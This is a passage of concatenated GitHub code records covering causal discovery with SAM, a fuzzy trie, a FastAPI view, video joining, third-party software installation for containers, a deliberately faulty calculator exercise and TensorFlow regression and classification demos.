th.from_numpy(data).to(device)\n if batch_size == -1:\n batch_size = data.shape[0]\n rows, cols = data.size()\n # Get the list of indexes to ignore\n if skeleton is not None:\n skeleton = th.from_numpy(skeleton.astype('float32'))\n\n sam = SAM_generators((batch_size, cols), nh, skeleton=skeleton,\n linear=linear).to(device)\n\n sam.reset_parameters()\n g_optimizer = th.optim.Adam(list(sam.parameters()), lr=lr_gen)\n\n if losstype != \"mse\":\n discriminator = SAM_discriminator(cols, dnh, hlayers).to(device)\n discriminator.reset_parameters()\n d_optimizer = th.optim.Adam(discriminator.parameters(), lr=lr_disc)\n criterion = th.nn.BCEWithLogitsLoss()\n else:\n criterion = th.nn.MSELoss()\n disc_loss = th.zeros(1)\n\n graph_sampler = MatrixSampler(nb_var, mask=skeleton,\n gumbel=False).to(device)\n graph_sampler.weights.data.fill_(2)\n graph_optimizer = th.optim.Adam(graph_sampler.parameters(), lr=lr_gen)\n\n if not linear:\n neuron_sampler = MatrixSampler((nh, nb_var), mask=False,\n gumbel=True).to(device)\n neuron_optimizer = th.optim.Adam(list(neuron_sampler.parameters()),\n lr=lr_gen)\n\n _true = th.ones(1).to(device)\n _false = th.zeros(1).to(device)\n output = th.zeros(nb_var, nb_var).to(device)\n\n noise = th.randn(batch_size, nb_var).to(device)\n noise_row = th.ones(1, nb_var).to(device)\n data_iterator = DataLoader(data, batch_size=batch_size,\n shuffle=True, drop_last=True)\n\n # RUN\n if verbose:\n pbar = tqdm(range(train + test))\n else:\n pbar = range(train+test)\n for epoch in pbar:\n for i_batch, batch in enumerate(data_iterator):\n g_optimizer.zero_grad()\n graph_optimizer.zero_grad()\n\n if losstype != \"mse\":\n d_optimizer.zero_grad()\n\n if not linear:\n neuron_optimizer.zero_grad()\n\n # Train the discriminator\n\n if not epoch > train:\n drawn_graph = graph_sampler()\n if not linear:\n drawn_neurons = neuron_sampler()\n else:\n drawn_neurons = None\n noise.normal_()\n generated_variables = sam(batch, noise,\n th.cat([drawn_graph, noise_row], 0),\n drawn_neurons)\n\n if losstype == \"mse\":\n gen_loss = criterion(generated_variables, batch)\n else:\n disc_vars_d = discriminator(generated_variables.detach(), batch)\n disc_vars_g = discriminator(generated_variables, batch)\n true_vars_disc = discriminator(batch)\n\n if losstype == \"gan\":\n disc_loss = sum([criterion(gen, _false.expand_as(gen)) for gen in disc_vars_d]) / nb_var \\\n + criterion(true_vars_disc, _true.expand_as(true_vars_disc))\n # Gen Losses per generator: multiply py the number of channels\n gen_loss = sum([criterion(gen,\n _true.expand_as(gen))\n for gen in disc_vars_g])\n elif losstype == \"fgan\":\n\n disc_loss = sum([th.mean(th.exp(gen - 1)) for gen in disc_vars_d]) / nb_var - th.mean(true_vars_disc)\n gen_loss = -sum([th.mean(th.exp(gen - 1)) for gen in disc_vars_g])\n\n disc_loss.backward()\n d_optimizer.step()\n\n filters = graph_sampler.get_proba()\n\n struc_loss = lambda1*drawn_graph.sum()\n\n func_loss = 0 if linear else lambda2*drawn_neurons.sum()\n regul_loss = struc_loss + func_loss\n\n if dagloss and epoch > train * dagstart:\n dag_constraint = notears_constr(filters*filters)\n loss = gen_loss + regul_loss + (dagpenalization +\n (epoch - train * dagstart)\n * dagpenalization_increase) * dag_constraint\n else:\n loss = gen_loss + regul_loss\n if verbose and epoch % 20 == 0 and i_batch == 0:\n pbar.set_postfix(gen=gen_loss.item()/cols,\n disc=disc_loss.item(),\n regul_loss=regul_loss.item(),\n tot=loss.item())\n\n if epoch < train + test - 1:\n loss.backward(retain_graph=True)\n\n if epoch >= 
train:\n                output.add_(filters.data)\n\n            g_optimizer.step()\n            graph_optimizer.step()\n            if not linear:\n                neuron_optimizer.step()\n\n    return output.div_(test).cpu().numpy()\n\n\nclass SAM(GraphModel):\n    \"\"\"SAM Algorithm.\n\n    **Description:** Structural Agnostic Model is a causal discovery algorithm\n    for DAG recovery leveraging both distributional asymmetries and conditional\n    independencies. The first version of SAM without DAG constraint is available\n    as ``SAMv1``.\n\n    **Data Type:** Continuous\n\n    **Assumptions:** The class of generative models is not restricted with a\n    hard constraint, but with soft constraints parametrized with the ``lambda1``\n    and ``lambda2`` parameters, with gumbel softmax sampling. This algorithm greatly\n    benefits from bootstrapped runs (nruns >=8 recommended).\n    GPUs are recommended but not compulsory. The output is a DAG, but may need a\n    thresholding as the output is averaged over multiple runs.\n\n    Args:\n        lr (float): Learning rate of the generators\n        dlr (float): Learning rate of the discriminator\n        lambda1 (float): L0 penalization coefficient on the causal filters\n        lambda2 (float): L0 penalization coefficient on the hidden units of the\n            neural network\n        nh (int): Number of hidden units in the generators' hidden layers\n            (regularized with lambda2)\n        dnh (int): Number of hidden units in the discriminator's hidden layer\n        train_epochs (int): Number of training epochs\n        test_epochs (int): Number of test epochs (saving and averaging\n            the causal filters)\n        batchsize (int): Size of the batches to be fed to the SAM model.\n            Defaults to full-batch.\n        losstype (str): type of the loss to be used (either 'fgan' (default),\n            'gan' or 'mse').\n        hlayers (int): Defines the number of hidden layers in the discriminator.\n        dagloss (bool): Activate the DAG with No-TEARS constraint.\n        dagstart (float): Controls when the DAG constraint is to be introduced\n            in the training (float ranging from 0 to 1, 0 denotes the start of\n            the training and 1 the end).\n        dagpenalization (float): Initial value of the DAG constraint.\n        dagpenalization_increase (float): Increment added to the coefficient\n            of the constraint at each epoch.\n        linear (bool): If true, all generators are set to be linear generators.\n        nruns (int): Number of runs to be made for causal estimation.\n            Recommended: >=8 for optimal performance.\n        njobs (int): Number of jobs to be run in parallel.\n            Recommended: 1 if no GPU is available, else 2 * number of GPUs.\n        gpus (int): Number of available GPUs for the algorithm.\n        verbose (bool): verbose mode\n\n    .. note::\n       Ref: Kalainathan, Diviyan & Goudet, Olivier & Guyon, Isabelle &\n       Lopez-Paz, David & Sebag, Michèle. (2018). 
Structural Agnostic Modeling:\n       Adversarial Learning of Causal Graphs.\n\n    Example:\n        >>> import networkx as nx\n        >>> from cdt.causality.graph import SAM\n        >>> from cdt.data import load_dataset\n        >>> data, graph = load_dataset(\"sachs\")\n        >>> obj = SAM()\n        >>> #The predict() method works without a graph, or with a\n        >>> #directed or undirected graph provided as an input\n        >>> output = obj.predict(data)    #No graph provided as an argument\n        >>>\n        >>> output = obj.predict(data, nx.Graph(graph))  #With an undirected graph\n        >>>\n        >>> output = obj.predict(data, graph)  #With a directed graph\n        >>>\n        >>> #To view the graph created, run the below commands:\n        >>> nx.draw_networkx(output, font_size=8)\n        >>> plt.show()\n    \"\"\"\n\n    def __init__(self, lr=0.01, dlr=0.01, lambda1=0.01, lambda2=0.00001, nh=200, dnh=200,\n                 train_epochs=10000, test_epochs=1000, batchsize=-1,\n                 losstype=\"fgan\", dagstart=0.5, dagloss=True, dagpenalization=0,\n                 dagpenalization_increase=0.001, linear=False, hlayers=2,\n                 njobs=None, gpus=None, verbose=None, nruns=8):\n\n        \"\"\"Init and parametrize the SAM model.\"\"\"\n        super(SAM, self).__init__()\n        self.lr = lr\n        self.dlr = dlr\n        self.lambda1 = lambda1\n        self.lambda2 = lambda2\n        self.nh = nh\n        self.dnh = dnh\n        self.train = train_epochs\n        self.test = test_epochs\n        self.batchsize = batchsize\n        self.losstype = losstype\n        self.dagstart = dagstart\n        self.dagloss = dagloss\n        self.dagpenalization = dagpenalization\n        self.dagpenalization_increase = dagpenalization_increase\n        self.linear = linear\n        self.hlayers = hlayers\n        self.njobs = SETTINGS.get_default(njobs=njobs)\n        self.gpus = SETTINGS.get_default(gpu=gpus)\n        self.verbose = SETTINGS.get_default(verbose=verbose)\n        self.nruns = nruns\n\n    def predict(self, data, graph=None,\n                return_list_results=False):\n        \"\"\"Execute SAM on a dataset, with or without a skeleton graph.\n\n        Args:\n            data (pandas.DataFrame): Observational data for estimation of causal relationships by SAM\n            graph (networkx.Graph): A priori knowledge about the causal relationships,\n                given as a graph. Can contain either directed or undirected links.\n        Returns:\n            networkx.DiGraph: Graph estimated by SAM, where A[i,j] is the term\n            of the ith variable for the jth generator.\n        \"\"\"\n        if graph is not None:\n            skeleton = th.Tensor(nx.adjacency_matrix(graph,\n                                                     nodelist=list(data.columns)).todense())\n        else:\n            skeleton = None\n\n        assert self.nruns > 0\n        if self.gpus == 0:\n            results = [run_SAM(data, skeleton=skeleton,\n                               lr_gen=self.lr,\n                               lr_disc=self.dlr,\n                               verbose=self.verbose,\n                               lambda1=self.lambda1, lambda2=self.lambda2,\n                               nh=self.nh, dnh=self.dnh,\n                               train=self.train,\n                               test=self.test, batch_size=self.batchsize,\n                               dagstart=self.dagstart,\n                               dagloss=self.dagloss,\n                               dagpenalization=self.dagpenalization,\n                               dagpenalization_increase=self.dagpenalization_increase,\n                               losstype=self.losstype,\n                               linear=self.linear,\n                               hlayers=self.hlayers,\n                               device='cpu') for i in range(self.nruns)]\n        else:\n            results = parallel_run(run_SAM, data, skeleton=skeleton,\n                                   nruns=self.nruns,\n                                   njobs=self.njobs, gpus=self.gpus, lr_gen=self.lr,\n                                   lr_disc=self.dlr,\n                                   verbose=self.verbose,\n                                   lambda1=self.lambda1, lambda2=self.lambda2,\n                                   nh=self.nh, dnh=self.dnh,\n                                   train=self.train,\n                                   test=self.test, batch_size=self.batchsize,\n                                   dagstart=self.dagstart,\n                                   dagloss=self.dagloss,\n                                   dagpenalization=self.dagpenalization,\n                                   dagpenalization_increase=self.dagpenalization_increase,\n                                   losstype=self.losstype,\n                                   linear=self.linear,\n                                   hlayers=self.hlayers)\n        list_out = [i for i in results if not np.isnan(i).any()]\n        try:\n            assert 
len(list_out) > 0\n        except AssertionError as e:\n            print(\"All solutions contain NaNs\")\n            raise e\n        W = sum(list_out)/len(list_out)\n        return nx.relabel_nodes(nx.DiGraph(W),\n                                {idx: i for idx,\n                                 i in enumerate(data.columns)})\n\n    def orient_directed_graph(self, *args, **kwargs):\n        \"\"\"Orient a (partially directed) graph.\"\"\"\n        return self.predict(*args, **kwargs)\n\n    def orient_undirected_graph(self, *args, **kwargs):\n        \"\"\"Orient an undirected graph.\"\"\"\n        return self.predict(*args, **kwargs)\n\n    def create_graph_from_data(self, *args, **kwargs):\n        \"\"\"Estimate a causal graph out of observational data.\"\"\"\n        return self.predict(*args, **kwargs)\n","repo_name":"haeggee/bacadi","sub_path":"CausalDiscoveryToolbox/cdt/causality/graph/SAM.py","file_name":"SAM.py","file_ext":"py","file_size_in_byte":18769,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"47"}
+{"seq_id":"16183205327","text":"from Trie import Trie, TrieNode\nimport heapq\nfrom collections import defaultdict, namedtuple\nfrom functools import lru_cache\n\nclass FuzzyTrie(Trie):\n\t'''\n\tImplements fuzzy matching that allows for single/multiple errors (insertion, deletion, substitution)\n\tDefault is 0 allowed errors, which behaves the same as the regular Trie.traverse, except it returns\n\t[TrieNode] instead of a single instance of TrieNode\n\t'''\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.head = TrieNode()\n\n\t@lru_cache(maxsize=1000)\n\tdef match_prefix(self, prefix, allowed_errors: int=0) -> dict:\n\t\t# First must match first char\n\t\tnode = self.head.traverse(prefix[0])\n\t\tif node is None:\n\t\t\treturn dict()\n\t\t# first prefix matched, now fuzzy traverse remaining prefix\n\t\ttraverse_results = node.fuzzy_traverse(prefix[1:], allowed_errors)\n\n\t\t# for each node in traverse results, generate resulting words and store\n\t\t# in dictionary with num_errors as key\n\t\tresult = dict()\n\t\tseen = set()\n\t\tfor num_errors, nodes in traverse_results.items():\n\t\t\tif num_errors not in result:\n\t\t\t\tresult[num_errors] = set()\n\t\t\tfor node in nodes:\n\t\t\t\twords = [node.prefix() + partial for partial in node.words()]\n\t\t\t\twords = set(word for word in words if word not in seen)\n\t\t\t\tresult[num_errors] |= words\n\t\t\t\tseen |= words\n\t\treturn result\n\n# simple unit test\nif __name__ == '__main__':\n\tfuzzy_trie = FuzzyTrie()\n\twords = ['at', 'about', 'attack', 'art', 'fresh', 'church', 'allow', 'ace', 'audio', 'bow', 'but', 'belief', 'try', 'trie', 'turning']\n\tfor word in words:\n\t\tfuzzy_trie.add_word(word)\n\n\tassert set(words) == set(fuzzy_trie.words())\n\tassert 'at' in fuzzy_trie\n\tassert 'belief' in fuzzy_trie\n\tassert 'cat' not in fuzzy_trie\n\tassert len(fuzzy_trie) == len(words)\n\n\tprint(fuzzy_trie.match_prefix('aut', 1).items())\n\n\n\n\t# assert set(trie.match_prefix('a')) == set([s for s in words if s.startswith('a')])\n\t# assert set(trie.match_prefix('at')) == set([s for s in 
words if s.startswith('at')])\n\t# assert set(trie.match_prefix('tru')) == set([s for s in words if s.startswith('tru')])\n\t# assert set(trie.match_prefix('hello')) == set([s for s in words if s.startswith('hello')])\n\t# assert 'about' in trie\n\t# trie.remove_word('about')\n\t# assert 'about' not in trie\n\t# assert len(trie) == len(words) - 1\n\t# trie.remove_word('but')\n\t# assert len(trie) == len(words) - 2\n\t# assert set(trie.words()) == (set(words) - set(['about', 'but']))\n\t# trie.remove_words(['attack', 'belief', 'not'])\n\t# assert set(trie.words()) == (set(words) - set(['about', 'but', 'attack', 'belief']))\n\t# trie.add_words(['about', 'but', 'attack', 'belief'])\n\t# assert set(words) == set(trie.words())\n\n","repo_name":"chris-kuo/mind-reader","sub_path":"FuzzyTrie.py","file_name":"FuzzyTrie.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"}
+{"seq_id":"28525409440","text":"from fastapi import APIRouter, responses\nfrom starlette.requests import Request\nfrom starlette.templating import Jinja2Templates\nfrom services import report_service\n\n# includes the built-in templating engine for FastAPI\ntemplates = Jinja2Templates('templates')\nrouter = APIRouter()\n\n\n@router.get('/', include_in_schema=False)\nasync def index(request: Request):\n    events = await report_service.get_reports()\n    data = {'request': request, 'events': events}\n    return templates.TemplateResponse(\"home/index.html\", data)\n\n\n# explicitly get favicon from static directory because request failed\n@router.get('/favicon.ico', include_in_schema=False)\ndef favicon():\n    return responses.RedirectResponse(url='/static/img/favicon.ico')","repo_name":"Danielatonge/WeatherAPI-FASTAPI","sub_path":"views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"10913990284","text":"from moviepy.editor import *\nimport math\nimport sys\n\ntry:\n\tvideo_1 = VideoFileClip(sys.argv[1])\n\tvideo_2 = VideoFileClip(sys.argv[2])\n\tvideo_3 = video_1.subclip(0,math.floor(video_1.duration)*0.8)\n\tvideo_4 = video_2\n\tfinal1 = video_3.resize((1080,1920))\n\tfinal2 = video_4.resize((1080,1920))\n\n\tfinalVideo = concatenate_videoclips([final1,final2])\n\tfinalVideo.write_videofile('final2.mp4',threads=20,fps=60,bitrate=\"2500k\")\nexcept:\n\tprint(\"Usage : python join.py 1.mp4 2.mp4\")","repo_name":"wmhchathuranga/tiktokscrapper","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"71795862544","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport json\nimport glob\nimport os\nimport os.path as osp\nimport shutil\nimport sys\nimport tempfile\n\n\nall_software = {\n    'spm12-standalone': None,\n    'freesurfer': None,\n}\ndefault_software = {\n    'spm12-standalone': None,\n}\nsearch_paths = ['/usr/local', '/drf/local', '/i2bm/local']\n\n\ndef get_thirdparty_software(install_thirdparty='default'):\n    '''\n    Iterate over thirdparty software, either given in the install_thirdparty\n    parameter, or using a default list.\n\n    Parameters\n    ----------\n    install_thirdparty: str\n        software to be found. If 'default', the default list\n        (``default_software``) will be used instead. If 'all', the complete\n        list (``all_software``) will be used. 
Otherwise it is a comma-\n        separated list of software names. Each can be provided a source\n        installation directory on the host, separated with a ``=`` sign. Ex::\n\n            'spm12-standalone=/opt/spm12-standalone,freesurfer'\n\n        When no path is specified, it will be looked for in a search path list\n        (``search_paths``).\n\n    Yields\n    ------\n    sw_path: str\n        path of the detected software\n    soft_name: str\n        name (and main directory) of the software\n    scripts: dict\n        scripts that should be run inside the container to install the software\n        or set it up in other software (like axon). The dict keys are the\n        install path inside the container, and the value is the script to be\n        run there, in a string.\n    env: dict\n        environment variables to be set in the container in order to make the\n        software work.\n\n    '''\n    if install_thirdparty.lower() == 'all':\n        software = all_software\n    elif install_thirdparty.lower() == 'default':\n        software = default_software\n    elif install_thirdparty.startswith('file://'):\n        filename = install_thirdparty[7:]\n        with open(filename) as f:\n            software = json.load(f)\n    else:\n        software_list = [x.strip() for x in install_thirdparty.split(',')]\n        software = {}\n        for soft_name in software_list:\n            sw_path1 = [x.strip() for x in soft_name.split('=', 1)]\n            sw_path = None\n            if len(sw_path1) == 2:\n                soft_name, sw_path = sw_path1\n            software[soft_name] = sw_path\n    for soft_name, sw_path in software.items():\n        if sw_path is None:\n            for sp in search_paths:\n                if osp.exists(osp.join(sp, soft_name)):\n                    sw_glob = [osp.join(sp, soft_name)]\n                else:\n                    sw_glob = glob.glob(osp.join(sp, '%s*' % soft_name))\n                if sw_glob:\n                    sw_path = osp.realpath(sorted(sw_glob)[0])\n                    break\n        if sw_path is None:\n            raise ValueError(\n                'Could not find location of %s. Please specify it as '\n                '%s=<path>' % (soft_name, soft_name))\n\n        init_fn = getattr(sys.modules[__name__],\n                          'get_%s_init' % soft_name.replace('-', '_'),\n                          None)\n        if init_fn:\n            scripts = init_fn()\n        else:\n            scripts = {}\n\n        env_fn = getattr(sys.modules[__name__],\n                         'get_%s_env' % soft_name.replace('-', '_'),\n                         None)\n        if env_fn:\n            env = env_fn()\n        else:\n            env = {}\n\n        yield sw_path, soft_name, scripts, env\n\n\ndef install_thirdparty_software(install_thirdparty, builder):\n    temps = []\n    try:\n        env = {}\n        if install_thirdparty not in (None, 'none', 'None', 'NONE'):\n            for source_dir, symlink_name, setup_scripts, env_dict \\\n                    in get_thirdparty_software(install_thirdparty):\n                print('installing %s from %s...' % (symlink_name, source_dir))\n                if source_dir.endswith('.tar') \\\n                        or source_dir.endswith('.tar.gz') \\\n                        or source_dir.endswith('.tar.bz2'):\n                    builder.extract_tar(source_dir, '/usr/local')\n                    source_dir = '.tar'.join(source_dir.split('.tar')[:-1])\n                else:\n                    builder.copy_root(source_dir, '/usr/local')\n                if symlink_name and osp.basename(source_dir) != symlink_name:\n                    builder.symlink(osp.basename(source_dir),\n                                    osp.join('/usr/local', symlink_name))\n                for script_file, script in setup_scripts.items():\n                    d = tempfile.mkdtemp(prefix='casa_distro_script')\n                    temps.append(d)\n                    tmp_name = osp.join(d, osp.basename(script_file))\n                    with open(tmp_name, 'w') as f:\n                        f.write(script)\n                    os.chmod(tmp_name, 0o755)\n                    dest_dir = osp.dirname(script_file)\n                    builder.run_root(('if [ ! 
-d \"{dest_dir}\" ]; then '\n 'mkdir -p \"{dest_dir}\"; '\n 'fi').format(dest_dir=dest_dir))\n builder.copy_root(tmp_name, dest_dir)\n builder.run_root('chmod a+rx \"{}\"'.format(script_file))\n builder.run_user(script_file)\n env.update(env_dict)\n\n if env:\n builder.environment(env)\n except Exception:\n for d in temps:\n shutil.rmtree(d)\n raise\n return temps\n\n\ndef get_spm12_standalone_init():\n ''' SPM setup script for Axon\n\n Note about SPM standalone:\n\n Here we copy an already installed directory, which should contain both the\n SPM standalone distribution, and the matlab MCR. We have used (for now)\n SPM12-7771 and MCR v97 as in:\n https://github.com/spm/spm-docker/blob/main/matlab/singularity.def\n\n The MCR is \"lightened\" using only the core + numerics packages, not the\n whole MCR (thus is 2.6 GB instead of 5.8 GB, which will increase in v911\n and later).\n See:\n https://github.com/brainvisa/casa-distro/issues/268\n\n We could have run the installation procedure the \"official\" way as in the\n spm-docker project, but this would involve systematic download of the SPM\n distribution and of the full MCR distribution at each container build,\n which takes too much time. So for now SPM has to be pre-installed on the\n host system. We could improve the procedure and download / install it only\n if it is not already present, but this would need to handle installation\n paths, permissions (sudo to install in /usr/local for instance) etc, which\n we don't want to deal with at the moment.\n '''\n # init script for axon\n spm_script = '''#!/usr/bin/env python\n\nimport glob\nimport os\nimport sys\n\nsys.path.insert(0, '/casa/install/python')\ntry:\n from brainvisa.configuration import neuroConfig\nexcept ImportError:\n # no axon in the image\n pass\n\nconf = list(neuroConfig.readConfiguration(neuroConfig.mainPath, None, ''))\nsiteOptionFile = conf[0][1]\nif siteOptionFile and os.path.exists(siteOptionFile):\n neuroConfig.app.configuration.load(siteOptionFile)\n\nneuroConfig.app.configuration.SPM.spm12_standalone_path = \\\n '/usr/local/spm12-standalone'\nneuroConfig.app.configuration.SPM.spm12_standalone_command = \\\n '/usr/local/spm12-standalone/run_spm12.sh'\nmcr_paths = glob.glob('/usr/local/spm12-standalone/mcr/v*')\nif len(mcr_paths) != 1:\n raise RuntimeError(\"Cannot find the MATLAB Compiler Runtime in the \"\n \"expected location, please check your \"\n \"install_thirdparty setting.\")\nneuroConfig.app.configuration.SPM.spm12_standalone_mcr_path = mcr_paths[0]\n\nfrom pprint import pprint\npprint(neuroConfig.app.configuration)\nneuroConfig.app.configuration.save(siteOptionFile)\n'''\n scripts = {'/casa/install/templates/brainvisa/spm.py': spm_script}\n\n return scripts\n\n\ndef get_spm12_standalone_env():\n ''' SPM env variables\n '''\n # env variables for SPM\n # (see https://github.com/brainvisa/casa-distro/issues/268)\n env = {'SPM_HTML_BROWSER': '0'}\n return env\n\n\ndef get_freesurfer_init():\n ''' Freesurfer setup script for Axon\n '''\n # init script for axon\n fs_script = '''#!/usr/bin/env python\n\nimport sys\nsys.path.insert(0, '/casa/install/python')\ntry:\n from brainvisa.configuration import neuroConfig\n import glob\n import os\n from brainvisa.configuration.freesurfer_configuration import \\\n FreeSurferConfiguration\n\n conf = list(neuroConfig.readConfiguration(neuroConfig.mainPath, None, ''))\n siteOptionFile = conf[0][1]\n if siteOptionFile and os.path.exists(siteOptionFile):\n neuroConfig.app.configuration.load(siteOptionFile)\n\n if 'freesurfer' 
not in neuroConfig.app.configuration.signature:\n neuroConfig.app.configuration.add('freesurfer',\n FreeSurferConfiguration())\n\n neuroConfig.app.configuration.freesurfer.freesurfer_home_path = \\\n '/usr/local/freesurfer'\n neuroConfig.app.configuration.freesurfer.subjects_dir_path = \\\n '/usr/local/freesurfer/subjects'\n\n neuroConfig.app.configuration.save(siteOptionFile)\n\nexcept ImportError:\n # no axon in the image\n pass\n'''\n scripts = {'/casa/install/templates/brainvisa/freesurfer.py': fs_script}\n\n return scripts\n\n\ndef get_freesurfer_env():\n ''' Freesurfer env variables\n '''\n # env variables for Freesurfer\n env = {'FREESURFER_HOME': '/usr/local/freesurfer'}\n return env\n","repo_name":"brainvisa/casa-distro","sub_path":"python/casa_distro/thirdparty.py","file_name":"thirdparty.py","file_ext":"py","file_size_in_byte":9642,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"10893056556","text":"# design a calculator which solves all problems correctly except for the given cases\r\n# these are the exceptions 45*3=555, 56+9=77, 56/6=4\r\n\r\n# function defining the work of calculator \r\ndef cal(operator, var1, var2):\r\n if operator == '+':\r\n if var1 == 56 and var2 == 9:\r\n print('result = 77')\r\n else:\r\n print(\"result = \", (var1 + var2))\r\n elif operator == '-':\r\n print(\"result =\", var1 - var2 )\r\n elif operator == '*':\r\n if var1 == 45 and var2 ==3:\r\n print(\"result = 555\")\r\n else : \r\n print(\"result =\",(var1 * var2))\r\n elif operator == '/':\r\n if var1 == 56 and var2 == 6: \r\n print(\"result = 4\")\r\n else:\r\n print(\"result = \", (var1/ var2))\r\n else :\r\n print('this operation is not available')\r\n\r\n# iterate it until prompted so \r\nans = 'y'\r\nwhile(ans == 'y'):\r\n operator = input(\"Enter the operator for operation you want to perform = \")\r\n var1,var2 = int(input(\"Enter the first variable = \")), int(input(\"Enter the second variable = \"))\r\n cal(operator, var1, var2)\r\n ans = input(\"Do you want another result(y/n) = \")","repo_name":"SameerVanjari/PythonProjects","sub_path":"Faulty_calc.py","file_name":"Faulty_calc.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"71176","text":"over_20kg_price, baggage_weight = float(input()), float(input())\nday_to_trip, bags_count = int(input()), int(input())\ncost = 0\nif baggage_weight < 10:\n cost = over_20kg_price * 20/100\nelif 10 <= baggage_weight <= 20:\n cost = over_20kg_price * 50/100\nelif baggage_weight > 20:\n cost = over_20kg_price\n\nif day_to_trip < 7:\n cost += cost * 40/100\nelif 7 <= day_to_trip <= 30:\n cost += cost * 15/100\nelif day_to_trip > 30:\n cost += cost * 10/100\n\nprint(f\" The total price of bags is: {(cost*bags_count):.2f} lv. \")","repo_name":"koevsky/SoftUni","sub_path":"Python-Basics/Exams/3.PB Exam/02. Add Bags.py","file_name":"02. 
Add Bags.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"29452657756","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTensorFlow implementation of back propagation: minimize the loss function by adjusting model variables\n    A regression example: fitting a plane\n    A classification example: splitting normal distributions into two classes\n\nWritten by WangKai on 2019/04/30 13:00:00 (UTC+08:00)\n    University of Chinese Academy of Sciences, Beijing, China\n    College of Earth and Planetary Sciences\n    Comments, bug reports and questions, please send to:\n    wangkai185@mails.ucas.edu.cn\n\nVersions:\n    Last updated: 2019/04/30\n        Algorithm built and tested\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.framework import ops\n\n\"\"\" Regression example: fitting a plane \"\"\"\n# Initialize the computational graph\nops.reset_default_graph()\nsess = tf.Session()\n# Generate phony data with NumPy, 100 points in total\nxy_vals = np.float32(np.random.rand(2, 100)) # random two-dimensional inputs\nz_vals = np.dot([0.100, 0.200], xy_vals) + 0.300 # the plane z = 0.1x + 0.2y + 0.3\n# Create placeholders\nxy_data = tf.placeholder(shape=[2, 100], dtype=tf.float32)\nz_target = tf.placeholder(shape=[100], dtype=tf.float32)\n# Create variables W, b as the fitting parameters\nW = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0))\nb = tf.Variable(tf.zeros([1]))\n# Create graph operations to build the linear model\nz = tf.matmul(W, xy_vals) + b\n# Create the L2 loss function\nloss = tf.reduce_mean(tf.square(z - z_vals))\n# Declare the optimizer: standard gradient descent, minimizing the squared error\n# A small learning rate converges slowly with high precision; a large one converges fast with low precision\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.5)\ntrain = optimizer.minimize(loss)\n# Initialize variables\ninit = tf.global_variables_initializer()\n# Launch the graph\nsess.run(init)\n# Train the algorithm to fit the plane: iterate 200 times, printing results every 20 iterations.\n# Each iteration feeds all point coordinates into the graph; TensorFlow automatically computes the loss and adjusts W, b to minimize it\nprint('Regression example:')\nfor step in range(0, 200):\n    sess.run(train, feed_dict={xy_data: xy_vals, z_target: z_vals})\n    if (step+1)%20 == 0:\n        print('Step #' + str(step+1) + ': W = ' + str(sess.run(W)) + '; b = ' + \n              str(sess.run(b)) + '; Loss = ' + \n              str(sess.run(loss, feed_dict={xy_data: xy_vals, z_target: z_vals})))\n# The best fit should be close to W = [[0.100 0.200]]; b = [0.300]\n\n\"\"\" Classification example: splitting normal distributions into two classes \"\"\"\n# Reset the computational graph\nops.reset_default_graph()\nsess = tf.Session()\n# Generate data from the normal distributions (N(-1,1), N(3,1)), 100 points in total\nx_vals = np.concatenate((np.random.normal(-1, 1, 50), np.random.normal(3, 1, 50)))[:,np.newaxis]\n# Create target labels: N(-1,1) is class '0', N(3,1) is class '1', 50 points each\ny_vals = np.concatenate((np.repeat(0., 50), np.repeat(1., 50)))[:,np.newaxis]\n# Create placeholders\nx_data = tf.placeholder(shape=[100, 1], dtype=tf.float32)\ny_target = tf.placeholder(shape=[100, 1], dtype=tf.float32)\n# Create variable A as the negative of the optimal class boundary; initialize with a random value near 10, far from the theoretical value -(-1+3)/2 = -1\nA = tf.Variable(tf.random_normal(mean=10, shape=[1]))\n# Create graph operations; the model is sigmoid(x+A)\nmy_output = tf.add(x_data, A)\n# Create the loss function: sigmoid cross entropy loss\nxentropy = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(logits=my_output, labels=y_target))\n# Declare the optimizer: standard gradient descent, minimizing the cross entropy\nmy_opt = tf.train.GradientDescentOptimizer(0.01)\ntrain_step = my_opt.minimize(xentropy)\n# Initialize variables\ninit = tf.global_variables_initializer()\nsess.run(init)\n# Iterate 100 times over the data, updating variable A accordingly; print A and the loss every 10 iterations\nprint('\\nClassification example:')\nfor i in range(100):\n    sess.run(train_step, feed_dict={x_data: x_vals, y_target: y_vals})\n    if (i+1)%10 == 0:\n        print('Step #' + str(i+1) + ': A = ' + str(sess.run(A)) + '; Loss = ' +\n              str(sess.run(xentropy, feed_dict={x_data: x_vals, y_target: y_vals})))\n# The best fit should approach A = [-1.]\n","repo_name":"GeoKylin/Step-By-Step-For-TensorFlow","sub_path":"TensorFlow_Graph/tensorflow_back_propagation.py","file_name":"tensorflow_back_propagation.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
